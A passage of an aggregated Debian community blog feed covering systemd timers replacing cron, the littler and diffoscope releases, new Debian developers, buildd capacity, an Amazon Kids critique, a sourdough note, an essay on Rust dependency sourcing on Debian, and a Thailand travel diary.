Mar 13 01:54:52 dorfl systemd[1]: Started regular-reboot.timer - Reboot on a Regular Basis.
</code></pre></div></div>
<h3 id="sidenote-replacing-all-cron-jobs-with-systemd-timers">Sidenote: Replacing all Cron Jobs with systemd Timers</h3>
<p>More generally, I’ve now replaced all cronjobs on my personal systems with
systemd timer units, mostly because I can now actually track failures via
<code class="language-plaintext highlighter-rouge">prometheus-node-exporter</code>. There are plenty of ways to hack in cron support
to the node exporter, but just moving to systemd units provides both
support for tracking failure and logging,
both of which make system administration much easier when things inevitably
go wrong.</p>
<h4 id="systemd-cron"><code class="language-plaintext highlighter-rouge">systemd-cron</code></h4>
<p>An alternative to converting everything by hand, if you happen to have
a lot of cronjobs is
<a href="https://github.com/systemd-cron/systemd-cron"><code class="language-plaintext highlighter-rouge">systemd-cron</code></a>.
It will make each crontab and <code class="language-plaintext highlighter-rouge">/etc/cron.*</code> directory into automatic
service and timer units.</p>
<p>Thanks to Alexandre Detiste for letting me know about this project.
I have few enough cron jobs that I’ve already converted, but
for anyone looking at a large number of jobs to convert
you’ll want to check it out!</p>
<h2 id="stage-three-monitor-that-its-working">Stage Three: Monitor that it’s working</h2>
<p>The final step here is confirm that these units actually work, beyond just
firing regularly.</p>
<p>I now have the following rule in my <code class="language-plaintext highlighter-rouge">prometheus-alertmanager</code> rules:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> - alert: UptimeTooHigh
expr: (time() - node_boot_time_seconds{job="node"}) / 86400 > 35
annotations:
summary: "Instance Has Been Up Too Long!"
description: "Instance Has Been Up Too Long!"
</code></pre></div></div>
<p>This will trigger an alert anytime that I have a machine up for more than 35
days. This actually helped me track down one machine that I had forgotten to
set up this new unit on<sup id="fnref:configmanagement"><a class="footnote" href="https://tookmund.com/feed.xml#fn:configmanagement" rel="footnote">4</a></sup>.</p>
<h2 id="not-everything-needs-to-scale">Not everything needs to scale</h2>
<p><img alt="Is It Worth The Time" src="https://imgs.xkcd.com/comics/is_it_worth_the_time.png" /></p>
<p>One of the most common fallacies programmers fall into is that we will jump
to automating a solution before we stop and figure out how much time it would even save.</p>
<p>In taking a slow improvement route to solve this problem for myself,
I’ve managed not to invest too much time<sup id="fnref:article"><a class="footnote" href="https://tookmund.com/feed.xml#fn:article" rel="footnote">5</a></sup> in worrying about this
but also achieved a meaningful improvement beyond my first approach of doing it
all by hand.</p>
<div class="footnotes">
<ol>
<li id="fn:cronoptions">
<p>You could also add a line to <code class="language-plaintext highlighter-rouge">/etc/crontab</code> or drop a script into <code class="language-plaintext highlighter-rouge">/etc/cron.monthly</code> depending on your system. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:cronoptions">↩</a></p>
</li>
<li id="fn:monthly">
<p>Why once a month? Mostly to avoid regular disruptions, but still be reasonably timely on updates. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:monthly">↩</a></p>
</li>
<li id="fn:cronformat">
<p>If you’re looking to understand the cron time format I recommend <a href="https://crontab.guru/">crontab guru</a>. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:cronformat">↩</a></p>
</li>
<li id="fn:configmanagement">
<p>In the long term I really should set up something like ansible to automatically push fleetwide changes like this but with fewer machines than fingers this seems like overkill. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:configmanagement">↩</a></p>
</li>
<li id="fn:article">
<p>Of course by now writing about it, I’ve probably doubled the amount of time I’ve spent thinking about this topic but oh well… <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:article">↩</a></p>
</li>
</ol>
</div>Jacob Adamshttps://tookmund.com/littler 0.3.20 on CRAN: Moar Features!http://dirk.eddelbuettel.com/blog/2024/03/23#littler-0.3.202024-03-23T22:06:00+00:00<p><img alt="max-heap image" height="100" src="https://dirk.eddelbuettel.com/images/letter-r.png" style="float: left; margin: 15px 30px 15px 15px;" width="100" /></p>
<p>The twentyfirst release of <a href="https://dirk.eddelbuettel.com/code/littler.html">littler</a> as a
<a href="https://cran.r-project.org/package=littler">CRAN package</a>
landed on CRAN just now, following in the now eighteen year history (!!)
as a package started by <a href="https://jeffreyhorner.blogspot.com/">Jeff</a> in 2006, and joined
by me a few weeks later.</p>
<p><a href="https://dirk.eddelbuettel.com/code/littler.html">littler</a>
is the first command-line interface for R as it predates
<code>Rscript</code>. It allows for piping as well for <em>shebang</em>
scripting via <code>#!</code>, uses command-line arguments more
consistently and still <a href="https://dirk.eddelbuettel.com/blog/2014/09/02#littler-faster-at-doing-nothing">starts
faster</a>. It also always loaded the <code>methods</code> package which
<code>Rscript</code> only began to do in recent years.</p>
<p><a href="https://dirk.eddelbuettel.com/code/littler.html">littler</a>
lives on Linux and Unix, has its difficulties on macOS due to
yet-another-braindeadedness there (who ever thought case-insensitive
filesystems as a default were a good idea?) and simply does not exist on
Windows (yet – the build system could be extended – see <a href="https://dirk.eddelbuettel.com/code/rinside.html">RInside</a> for
an existence proof, and volunteers are welcome!). See the <a href="https://cran.r-project.org/web/packages/littler/vignettes/littler-faq.html">FAQ
vignette</a> on how to add it to your <code>PATH</code>. A few examples
are highlighted at the <a href="https://github.com/eddelbuettel/littler">Github repo</a>:, as well
as in the <a href="https://cran.r-project.org/web/packages/littler/vignettes/littler-examples.html">examples
vignette</a>.</p>
<p>This release contains another fair number of small changes and
improvements to some of the scripts I use daily to build or test
packages, adds a new front-end <code>ciw.r</code> for the
recently-released <a href="https://dirk.eddelbuettel.com/code/ciw.html">ciw</a> package
offering a ‘CRAN Incoming Watcher’, a new helper
<code>installDeps2.r</code> (extending <code>installDeps.r</code>), a
new doi-to-bib converter, allows a different temporary directory setup I
find helpful, deals with one corner deployment use, and more.</p>
<p>The full change description follows.</p>
<blockquote>
<h4 id="changes-in-littler-version-0.3.20-2024-03-23">Changes in littler
version 0.3.20 (2024-03-23)</h4>
<ul>
<li><p>Changes in examples scripts</p>
<ul>
<li><p>New (dependency-free) helper <code>installDeps2.r</code> to
install dependencies</p></li>
<li><p>Scripts <code>rcc.r</code>, <code>tt.r</code>,
<code>tttf.r</code>, <code>tttlr.r</code> use <code>env</code> argument
<code>-S</code> to set <code>-t</code> to <code>r</code></p></li>
<li><p><code>tt.r</code> can now fill in <code>inst/tinytest</code> if
it is present</p></li>
<li><p>New script <code>ciw.r</code> wrapping new package <span class="pkg">ciw</span></p></li>
<li><p><code>tttf.t</code> can now use <span class="pkg">devtools</span>
and its <code>loadall</code></p></li>
<li><p>New script <code>doi2bib.r</code> to call the DOI converter REST
service (following a skeet by Richard McElreath)</p></li>
</ul></li>
<li><p>Changes in package</p>
<ul>
<li><p>The CI setup uses checkout@v4 and the r-ci-setup action</p></li>
<li><p>The Suggests: is a little tighter as we do not list all packages
optionally used in the the examples (as R does not check for it
either)</p></li>
<li><p>The package load messag can account for the rare build of R under
different architecture (Berwin Turlach in <a href="https://github.com/eddelbuettel/littler/pull/117">#117</a> closing
<a href="https://github.com/eddelbuettel/littler/issues/116">#116</a>)</p></li>
<li><p>In non-vanilla mode, the temporary directory initialization in
re-run allowing for a non-standard temp dir via config settings</p></li>
</ul></li>
</ul>
</blockquote>
<p>My <a href="https://dirk.eddelbuettel.com/cranberries/">CRANberries</a>
service provides a comparison to <a href="https://dirk.eddelbuettel.com/cranberries/2024/03/23/#littler_0.3.20">the
previous release</a>. Full details for the <a href="https://dirk.eddelbuettel.com/code/littler.html">littler</a>
release are provided as usual at the <a href="https://github.com/eddelbuettel/littler/blob/master/ChangeLog">ChangeLog</a>
page, and also on the <a href="https://eddelbuettel.github.io/littler/">package docs website</a>.
The code is available via the <a href="https://github.com/eddelbuettel/littler">GitHub</a> repo, from
tarballs and now of course also from <a href="https://cran.r-project.org/package=littler">its CRAN page</a> and
via <code>install.packages("littler")</code>. Binary packages are
available directly in <a href="https://www.debian.org">Debian</a> as
well as (in a day or two) <a href="https://cran.r-project.org/bin/linux/ubuntu">Ubuntu binaries at
CRAN</a> thanks to the tireless Michael Rutter.</p>
<p>Comments and suggestions are welcome at the <a href="https://github.com/eddelbuettel/littler">GitHub</a> repo.</p>
<p>If you like this or other open-source work I do, you can <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>Dirk Eddelbuettelhttp://dirk.eddelbuettel.com/blogNew Debian Developers and Maintainers (January and February 2024)tag:bits.debian.org,2024-03-23:/2024/03/new-developers-2024-02.html2024-03-23T15:00:00+00:00<p>The following contributors got their Debian Developer accounts in the last two months:</p>
<ul>
<li>Carles Pina i Estany (cpina)</li>
<li>Dave Hibberd (hibby)</li>
<li>Soren Stoutner (soren)</li>
<li>Daniel Gröber (dxld)</li>
<li>Jeremy Sowden (azazel)</li>
<li>Ricardo Ribalda Delgado (ribalda)</li>
</ul>
<p>The following contributors were added as Debian Maintainers in the last two months:</p>
<ul>
<li>Joachim Bauch</li>
<li>Ananthu C V</li>
<li>Francesco Ballarin</li>
<li>Yogeswaran Umasankar</li>
<li>Kienan Stewart</li>
</ul>
<p>Congratulations!</p>Jean-Pierre Giraudhttps://bits.debian.org/How about allocating more buildd resource for armel and armhf?hatenablog://entry/68018831890930535382024-03-23T12:15:15+00:00<p>This article is cross-posting from grow-your-ideas. This is just an idea.</p>
<p><cite class="hatena-citation"><a href="https://salsa.debian.org/debian/grow-your-ideas/-/issues/44">salsa.debian.org</a></cite></p>
<h1 id="The-problem">The problem</h1>
<p>According to Developer Machines [1],
current buildd machines are like this:</p>
<ul>
<li>armel: 4 buildd (4 for arm64/armhf/armel)</li>
<li>armhf: 7 buildd (4 for arm64/armhf/armel and 3 for armhf only)</li>
</ul>
<p>[1] <a href="https://db.debian.org/machines.cgi">https://db.debian.org/machines.cgi</a></p>
<p>In contrast to other buildd architectures, these instances are quite a few and it seems that
it causes a shortage of buildd resourses. (e.g. during mass transition, give-back turn around time
becomes longer and longer.)</p>
<h1 id="Actual-situation">Actual situation</h1>
<p>As you know, during 64bit time_t transition, many packages should be built,
but it seems that +b1 or +bN build becomes slower. (I've hit BD-Uninstalled some times because of missing <a class="keyword" href="https://d.hatena.ne.jp/keyword/dependency">dependency</a> rebuild)</p>
<p><span><img class="hatena-fotolife" height="939" src="https://cdn-ak.f.st-hatena.com/images/fotolife/k/kenhys/20240323/20240323211116.png" title="" width="1082" /></span></p>
<p>ref. <a href="https://qa.debian.org/dose/debcheck/unstable_main/index.html">https://qa.debian.org/dose/debcheck/unstable_main/index.html</a></p>
<h1 id="Expected-situation">Expected situation</h1>
<p>Allocate more buildd resources for armel and armhf.</p>
<p><s>It is just an idea, but how about assigning some buildd as armel/armhf buildd?</s></p><s>
<ul>
<li>arm-arm-01.<a class="keyword" href="https://d.hatena.ne.jp/keyword/debian">debian</a>.org</li>
<li>arm-arm-03.<a class="keyword" href="https://d.hatena.ne.jp/keyword/debian">debian</a>.org</li>
<li>arm-arm-04.<a class="keyword" href="https://d.hatena.ne.jp/keyword/debian">debian</a>.org</li>
</ul>
<p>Above buildd is used only for arm64 buildd currently.</p>
</s><p><s>Maybe there is some technical reason not suitable for armel/armhf buildd, but I don't know yet.
</s></p>
<blockquote><p>2024/03/24 UPDATE: arm-arm01,arm-arm03,arm-arm-04 has already assigned to armel/armhf buildd, so it is an invalid proposal.
See <a href="https://buildd.debian.org/status/architecture.php?a=armhf&suite=sid&buildd=buildd_arm64-arm-arm-01">https://buildd.debian.org/status/architecture.php?a=armhf&suite=sid&buildd=buildd_arm64-arm-arm-01</a>,
<a href="https://buildd.debian.org/status/architecture.php?a=armhf&suite=sid&buildd=buildd_arm64-arm-arm-03">https://buildd.debian.org/status/architecture.php?a=armhf&suite=sid&buildd=buildd_arm64-arm-arm-03</a>,
<a href="https://buildd.debian.org/status/architecture.php?a=armhf&suite=sid&buildd=buildd_arm64-arm-arm-04">https://buildd.debian.org/status/architecture.php?a=armhf&suite=sid&buildd=buildd_arm64-arm-arm-04</a></p></blockquote>
<h1 id="Additional-information">Additional information</h1>
<ul>
<li>arm64: 10 buildd (4 for arm64/armhf/armel, 6 for arm64 only)</li>
<li><a class="keyword" href="https://d.hatena.ne.jp/keyword/amd64">amd64</a>: 7 buildd (5 for <a class="keyword" href="https://d.hatena.ne.jp/keyword/amd64">amd64</a>/<a class="keyword" href="https://d.hatena.ne.jp/keyword/i386">i386</a> buildd)</li>
<li>riscv64: 9 buildd</li>
</ul>Kentaro Hayashihttps://kenhys.hatenablog.jp/archive/category/PlanetDebianDo not get Amazon Kids+ or a Fire HD Kidstag:www.vitavonni.de,2018-01-29:blog/v3//blog/202403/amazon-kids-has-no-whitelist2024-03-23T10:15:08+00:00<p>The Amazon Kids “parental controls” are extremely <em>insufficient</em>, and I strongly advise against getting any of the Amazon Kids series.</p>
<p>The initial permise (and some older reviews) look okay: you can set some time limits, and you can disable anything that requires buying.
With the hardware you get one year of the “Amazon Kids+” subscription, which includes a lot of interesting content such as books and audio,
but also some apps. This seemed attractive: some learning apps, some decent games.
Sometimes there seems to be a special “Amazon Kids+ edition”, supposedly one that has advertisements reduced/removed and no purchasing.</p>
<p>However, there are <em>so many things just wrong in Amazon Kids</em>:</p>
<ul>
<li>you have <strong>no control over the starting page of the tablet</strong>.<br />
it is entirely up to Amazon to decide which contents are for your kid, and of course the page is as poorly made as possible</li>
<li>the main content control is a simple <em>age filter</em><br />
age appropriateness is decided by Amazon in a non-transparent way</li>
<li>there is <em>no preview</em>. All you get is one icon and a truncated title, no description, no screenshots, nothing.</li>
<li><strong>time restrictions</strong> are on the most basic level possible (daily limit for weekdays and weekends), largely unusable<br />
no easy way to temporarily increase the limit by 30 minutes, for example. You end up disabling it all the time.</li>
<li>there is some “educational goals” thing, but as you do not get to control what is educational and what not, it is paperweight</li>
<li><strong>no per-app limits</strong><br />
this is a killer missing feature.</li>
<li><strong>removing content</strong> is a <em>very</em> manual thing. You have to go through potentially thousands of entries, and disable them one-by-one for every kid.</li>
<li><strong>some contents cannot even be removed anymore</strong><br />
“managed by age filters and cannot be changed” - these appear to be HTML5 and not real apps</li>
<li>there is <strong>no whitelist</strong>!<br />
That is the really no-go. By using Amazon Kids, you <strong>fully expose your kids to the endless rabbit hole of apps</strong>.</li>
<li>you <strong>cannot switch to an alternate UI</strong> that has better parental controls<br />
without sideloading, you cannot even get YouTube Kids (which still is not really good either) on it, as it does not have Google services.<br />
and even with sideloading, you do not appear to be able to permanently replace the launcher anymore.</li>
</ul>
<p>And, unfortunately, Amazon Kids is <strong>full of poor content for kids</strong>, such as “DIY Fashion Star” that I consider to be very dangerous for kids: it is extremely stereotypical, beginning with supposedly “female” color schemes, model-only body types, and judging people by their clothing (and body).</p>
<p>You really thought you could hand-pick suitable apps for your kid on your own?</p>
<p>No, you have to identify and remove such contents one by one, with many clicks each, because there is no whitelisting, and no mass-removal (anymore - apparently Amazon removed the workarounds that previously allowed you to mass remove contents).</p>
<p>Not with Amazon Kids+, which apparently aims at raising the next generation of <strong>zombie customers that buy whatever you tell them to buy</strong>.</p>
<p>Hence, do not get your kids an Amazon Fire HD tablet!</p>Erich Schuberthttps://www.vitavonni.de/blog/Forgotten Yeast Bread - Sourdough Editionhttps://blog.trueelena.org/blog/2024/03/23-forgotten_yeast_bread_sourdough_edition/index.html2024-03-23T00:00:00+00:00<article>
<section class="header">
Posted on March 23, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Aatoms.html" title="All pages tagged 'madeof:atoms'.">madeof:atoms</a>, <a href="https://blog.trueelena.org/tags/craft%3Acooking.html" title="All pages tagged 'craft:cooking'.">craft:cooking</a>, <a href="https://blog.trueelena.org/tags/craft%3Abaking.html" title="All pages tagged 'craft:baking'.">craft:baking</a>, <a href="https://blog.trueelena.org/tags/craft%3Abread.html" title="All pages tagged 'craft:bread'.">craft:bread</a>
</section>
<section>
<p>Yesterday I had planned a <a href="https://blog.trueelena.org/blog/2023/10/29-forgotten_yeast_bread_or_pan_sbagliato/index.html">pan sbagliato</a> for today, but I also had
quite a bit of sourdough to deal with, so instead of mixing a bit of of
dry yeast at 18:00 and mixing it with some additional flour and water at
21:00, at around maybe 20:00 I substituted:</p>
<ul>
<li>100 g firm sourdough;</li>
<li>33 g flour;</li>
<li>66 g water.</li>
</ul>
<p>Then I briefly woke up in the middle of the night and poured the dough
on the tray at that time instead of having to wake up before 8:00 in the
morning.</p>
<p>Everything else was done as in the original recipe.</p>
<p>The firm sourdough is feeded regularly with the same weight of flour and
half the weight of water.</p>
<p>Will. do. again.</p>
</section>
</article>Elena “of Valhalla”https://blog.trueelena.orgdiffoscope 261 releasedhttps://diffoscope.org/news/diffoscope-261-released/2024-03-22T00:00:00+00:00<p>The diffoscope maintainers are pleased to announce the release of diffoscope
version <code class="language-plaintext highlighter-rouge">261</code>. This version includes the following changes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ Chris Lamb ]
* Don't crash if we encounter an .rdb file without an equivalent .rdx file.
(Closes: #1066991)
* In addition, don't identify Redis database dumps (etc.) as GNU R database
files based simply on their filename. (Re: #1066991)
* Update copyright years.
</code></pre></div></div>
<p>You find out more by <a href="https://diffoscope.org">visiting the project homepage</a>.</p>Reproducible Builds (diffoscope)https://diffoscope.org/How to use Rust on Debian (and Ubuntu, etc.)tag:dreamwidth.org,2009-05-21:377446:181222024-03-21T21:47:04+00:00<p>tl;dr: Don’t just <code>apt install rustc cargo</code>. Either do that <strong>and make sure to use only Rust libraries from your distro</strong> (with the tiresome config runes below); or, just use <a href="https://www.rust-lang.org/learn/get-started">rustup</a>.
</p><ul><li><a href="https://diziet.dreamwidth.org/data/atom#dont-do-the-obvious-thing-its-never-what-you-want">Don’t do the obvious thing; it’s never what you want</a><ul><li><a href="https://diziet.dreamwidth.org/data/atom#q.-download-and-run-whatever-code-from-the-internet">Q. Download and run whatever code from the internet?</a>
</li></ul>
</li><li><a href="https://diziet.dreamwidth.org/data/atom#option-1-wtf-no-i-dont-want-curlbash">Option 1: WTF, no I don’t want <code>curl|bash</code></a>
</li><li><a href="https://diziet.dreamwidth.org/data/atom#option-2-biting-the-curlbash-bullet">Option 2: Biting the <code>curl|bash</code> bullet</a><ul><li><a href="https://diziet.dreamwidth.org/data/atom#privilege-separation">Privilege separation</a>
</li></ul>
</li><li><a href="https://diziet.dreamwidth.org/data/atom#omg-what-a-mess">OMG what a mess</a>
</li></ul>
<a name="cutid1"></a>
<p>
</p><h3><a name="dont-do-the-obvious-thing-its-never-what-you-want">Don’t do the obvious thing; it’s never what you want</a></h3>
<p>Debian ships a Rust compiler, and a large number of Rust libraries.
</p><p>But if you just do things the obvious “default” way, with <code>apt install rustc cargo</code>, you will end up using Debian’s <em>compiler</em> but <em>upstream</em> libraries, directly and uncurated from crates.io.
</p><p>This is not what you want. There are about two reasonable things to do, depending on your preferences.
</p><h4><a name="q.-download-and-run-whatever-code-from-the-internet">Q. Download and run whatever code from the internet?</a></h4>
<p>The key question is this:
</p><p>Are you comfortable downloading code, directly from hundreds of upstream Rust package maintainers, and running it ?
</p><p>That’s what <code>cargo</code> does. It’s one of the main things it’s <em>for</em>. Debian’s <code>cargo</code> behaves, in this respect, just like upstream’s. Let me say that again:
</p><p><strong>Debian’s cargo promiscuously downloads code from crates.io</strong> just like upstream cargo.
</p><p>So if you use Debian’s cargo in the most obvious way, you are <em>still</em> downloading and running all those random libraries. The only thing you’re <em>avoiding</em> downloading is the Rust compiler itself, which is precisely the part that is most carefully maintained, and of least concern.
</p><p>Debian’s cargo can even download from crates.io when you’re building official Debian source packages written in Rust: if you run <code>dpkg-buildpackage</code>, the downloading is suppressed; but a plain <code>cargo build</code> will try to obtain and use dependencies from the upstream ecosystem. (“Happily”, if you do this, it’s quite likely to bail out early due to version mismatches, before actually downloading anything.)
</p><h3><a name="option-1-wtf-no-i-dont-want-curlbash">Option 1: WTF, no I don’t want <code>curl|bash</code></a></h3>
<p>OK, but then you must limit yourself to libraries available <em>within</em> Debian. Each Debian release provides a curated set. It may or may not be sufficient for your needs. Many capable programs can be written using the packages in Debian.
</p><p>But any <em>upstream</em> Rust project that you encounter is likely to be a pain to get working, unless their maintainers specifically intend to support this. (This is fairly rare, and the Rust tooling doesn’t make it easy.)
</p><p>To go with this plan, <code>apt install rustc cargo</code> and <strong>put this in your configuration</strong>, in <code>$HOME/.cargo/config.toml</code>:
</p><pre><code>[source.debian-packages]
directory = "/usr/share/cargo/registry"
[source.crates-io]
replace-with = "debian-packages"</code></pre><p>This causes cargo to look in <code>/usr/share</code> for dependencies, rather than downloading them from crates.io. You must then install the <code>librust-FOO-dev</code> packages for each of your dependencies, with <code>apt</code>.
</p><p>This will allow you to write your own program in Rust, and build it using <code>cargo build</code>.
</p><h3><a name="option-2-biting-the-curlbash-bullet">Option 2: Biting the <code>curl|bash</code> bullet</a></h3>
<p>If you want to build software that isn’t specifically targeted at Debian’s Rust you will probably <em>need</em> to use packages from crates.io, <em>not</em> from Debian.
</p><p>If you’re doing to do that, there is little point not using <a href="https://www.rust-lang.org/learn/get-started">rustup</a> to get the latest compiler. rustup’s install rune is alarming, but cargo will be doing exactly the same kind of thing, only worse (because it trusts many more people) and more hidden.
</p><p>So in this case: <em>do</em> run the <a href="https://www.rust-lang.org/learn/get-started"><code>curl|bash</code> install rune</a>.
</p><p>Hopefully the Rust project you are trying to build have shipped a <code>Cargo.lock</code>; that contains hashes of all the dependencies that <em>they</em> last used and tested. If you run <code>cargo build --locked</code>, cargo will <em>only</em> use those versions, which are hopefully OK.
</p><p>And you can run <code>cargo audit</code> to see if there are any reported vulnerabilities or problems. But you’ll have to bootstrap this with <code>cargo install --locked cargo-audit</code>; cargo-audit is from the <a href="https://rustsec.org/">RUSTSEC</a> folks who do care about these kind of things, so hopefully running their code (and their dependencies) is fine. Note the <code>--locked</code> which is needed because <a href="https://github.com/rust-lang/cargo/issues/7169">cargo’s default behaviour is wrong</a>.
</p><h4><a name="privilege-separation">Privilege separation</a></h4>
<p>This approach is rather alarming. For my personal use, I wrote a privsep tool which allows me to run all this upstream Rust code as a separate user.
</p><p>That tool is <a href="https://diziet.dreamwidth.org/8848.html">nailing-cargo</a>. It’s not particularly well productised, or tested, but it does work for at least one person besides me. You may wish to try it out, or consider alternative arrangements. <a href="https://salsa.debian.org/iwj/nailing-cargo">Bug reports and patches welcome</a>.
</p><h3><a name="omg-what-a-mess">OMG what a mess</a></h3>
<p>Indeed. There are large number of technical and social factors at play.
</p><p>cargo itself is deeply troubling, both in principle, and in detail. I often find myself severely disappointed with its maintainers’ decisions. In mitigation, much of the wider Rust upstream community <em>does</em> takes this kind of thing very seriously, and often makes good choices. <a href="https://rustsec.org/">RUSTSEC</a> is one of the results.
</p><p>Debian’s technical arrangements for Rust packaging are quite dysfunctional, too: IMO the scheme is based on fundamentally wrong design principles. But, the Debian Rust packaging team is dynamic, constantly working the update treadmills; and the team is generally welcoming and helpful.
</p><p>Sadly last time I explored the possibility, the Debian Rust Team didn’t have the appetite for more fundamental changes to the <a href="https://salsa.debian.org/rust-team/debcargo-conf/-/blob/master/README.rst">workflow</a> (including, for example, <a href="https://diziet.dreamwidth.org/10559.html">changes to dependency version handling</a>). Significant improvements to upstream cargo’s approach seem unlikely, too; we can only hope that eventually someone might manage to supplant it.
</p><address>edited 2024-03-21 21:49 to add a cut tag</address><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><p></p><br /><br /><img alt="comment count unavailable" height="12" src="https://www.dreamwidth.org/tools/commentcount?user=diziet&ditemid=18122" style="vertical-align: middle;" width="30" /> commentsIan Jacksonhttps://diziet.dreamwidth.org/Thailand Triphttps://ravidwivedi.in/posts/thailand-trip/2024-03-21T20:45:00+00:00<p>This post is the second and final part of my Malaysia-Thailand trip. Feel free to check out the Malaysia part <a href="https://ravidwivedi.in/posts/malaysia-trip">here</a> if you haven’t already. Kuala Lumpur to Bangkok is around 1500 km by road, and so I took a Malaysian Airlines flight to travel to Bangkok. The flight staff at the Kuala Lumpur only asked me for a return/onward flight and Thailand immigration asked a few questions but did not check any documents (obviously they checked and stamped my passport ;)). The currency of Thailand is the Thai baht, and 1 Thai baht = 2.5 Indian Rupees. The Thailand time is 1.5 hours ahead of Indian time (For example, if it is 12 noon in India, it will be 13:30 in Thailand).</p>
<p>I landed in Bangkok at around 3 PM local time. Fletcher was in Bangkok that time, leaving for Pattaya and we had booked the same hostel. So I took a bus to Pattaya from the airport. The next bus for which the tickets were available was at 7 PM, so I took tickets for that one. The bus ticket cost was 143 Thai Baht. I didn’t buy SIM at the airport, thinking there must be better deals in the city. As a consequence, there was no way to contact Fletcher through internet. Although I had a few minutes call remaining out of my international roaming pack.</p>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/a-welcome-sign-at-suvarnabhumi-airport.jpg" width="300" />
<h4>A welcome sign at Bangkok's Suvarnabhumi airport.</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/suvarnabhumi-bus.jpg" width="300" />
<h4>Bus from Suvarnabhumi Airport to Jomtien Beach in Pattaya.</h4>
</figure>
<p>Our accommodation was near Jomtien beach, so I got off at the last stop, as the bus terminates at the Jomtien beach. Then I decided to walk towards my accommodation. I was using <a href="https://osmand.net/">OsmAnd</a> for navigation. However, the place was not marked on OpenStreetMap, and it turned out I missed the street my hostel was on and walked around 1 km further as I was chasing a similarly named incorrect hostel on OpenStreetMap. Then I asked for help from two men sitting at a café. One of them said he will help me find the street my hostel is on. So, I walked with him, and he told me he lives in Thailand for many years, but he is from Kuwait. He also gave me valuable information. Like, he told me about shared hail-and-ride <a href="https://en.wikipedia.org/wiki/Songthaew">songthaews</a> which run along the Jomtien Second Road and charge 10 Baht for any distance on their route. This tip significantly reduced our expenses. Further, he suggested me 7-Eleven shops for buying a local SIM. Like Malaysia, Thailand has 24/7 7-Eleven convenience stores, a lot of them not even 100 m apart.</p>
<p>The Kuwaiti person dropped me at the address where my hostel was. I tried searching for a person in-charge of that hostel, and soon I realized there was no reception. After asking for help from locals for some time, I bumped into Fletcher, who also came to this address and was searching for the same. After finding a friend, I felt a sigh of relief. Adjacent to the property, there was a hairdresser shop. We went there and asked about this property. The woman called the owner, and she also told us the required passcodes to go inside. Our accommodation was in a room on the second floor, which required us to put a passcode for opening. We entered the passcode and entered the room. So, we stayed at this hostel which had no reception. Due to this, it took 2 hours to find our room and enter. It reminded me of a difficult experience <a href="https://ravidwivedi.in/posts/tough-day-in-albania/">I had in Albania</a>, where me and Akshat were not able to find our apartment in one of the hottest days and the owner didn’t know our language.</p>
<p>Traveling from the place where the bus dropped me to the hostel, I saw streets were filled with bars and massage parlors, which was expected. Prostitutes were everywhere. We went out at night towards the beach and also roamed around in 7-Elevens to buy a SIM card for myself. I got a SIM for 7 day unlimited internet for 399 baht. Turns out that the rates of SIM cards at the airport were not so different from inside the city.</p>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/jomtien-second-road.jpg" width="300" />
<h4>Road near Jomtien beach in Pattaya</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/songthaew.jpg" width="300" />
<h4>Photo of a songthaew in Pattaya. There are shared songthaews which run along Jomtien Second road and takes 10 bath to anywhere on the route.</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/jomtien-beach.jpg" width="300" />
<h4>Jomtien Beach in Pattaya.</h4>
</figure>
<p>In terms of speaking English, locals didn’t know English at all in both Pattaya and Bangkok. I normally don’t expect locals to know English in a non-English speaking country, but the fact that Bangkok is one of the most visited places by tourists made me expect locals to know some English. Talking to locals is an integral part of travel for me, which I couldn’t do a lot in Thailand. This aspect is much more important for me than going to touristy places.</p>
<p>So, we were in Pattaya. Next morning, Fletcher and I went to Tiger park using shared songthaew. After that, we planned to visit Pattaya Floating market which is near the Tiger Park, but we felt the ticket prices were higher than it was worth. Fletcher had to leave for Bangkok on that day. I suggested him to go to Suvarnabhumi Airport from the Jomtien beach bus terminal (this was the route I took the last day in opposite direction) to avoid traffic congestion inside Bangkok, as he can follow up with metro once he reaches the airport. From the floating market, we were walking in sweltering heat to reach the Jomtien beach. I tried asking for a lift and eventually got successful as a scooty stopped, and surprisingly the person gave a ride to both of us. He was from Delhi, so maybe that’s the reason he stopped for us. Then we took a songthaew to the bus terminal and after having lunch, Fletcher left for Bangkok.</p>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/a-welcome-sign-at-Pattaya-floating-market.jpg" width="300" />
<h4>A welcome sign at Pattaya Floating market.</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/vegetasty.jpg" width="300" />
<h4>This Korean Vegetasty noodles pack was yummy and was available at many 7-Eleven stores.</h4>
</figure>
<p>Next day I went to Bangkok, but Fletcher already left for Kuala Lumpur. Here I had booked a private room in a hotel (instead of a hostel) for four nights, mainly because of my luggage. This costed 5600 INR for four nights. It was 2 km from the metro station, which I used to walk both sides. In Bangkok, I visited Sukhumvit and Siam by metro. Going to some areas require crossing the Chao Phraya river. For this, I took Chao Phraya Express Boat for going to places like Khao San road and <a href="https://en.wikipedia.org/wiki/Wat_Arun">Wat Arun</a>. I would recommend taking the boat ride as it had very good views. In Bangkok, I met a person from Pakistan staying in my hotel and so here also I got some company. But by the time I met him, my days were almost over. So, we went to a random restaurant selling Indian food where we ate some paneer dish with naan and that restaurant person was from Myanmar.</p>
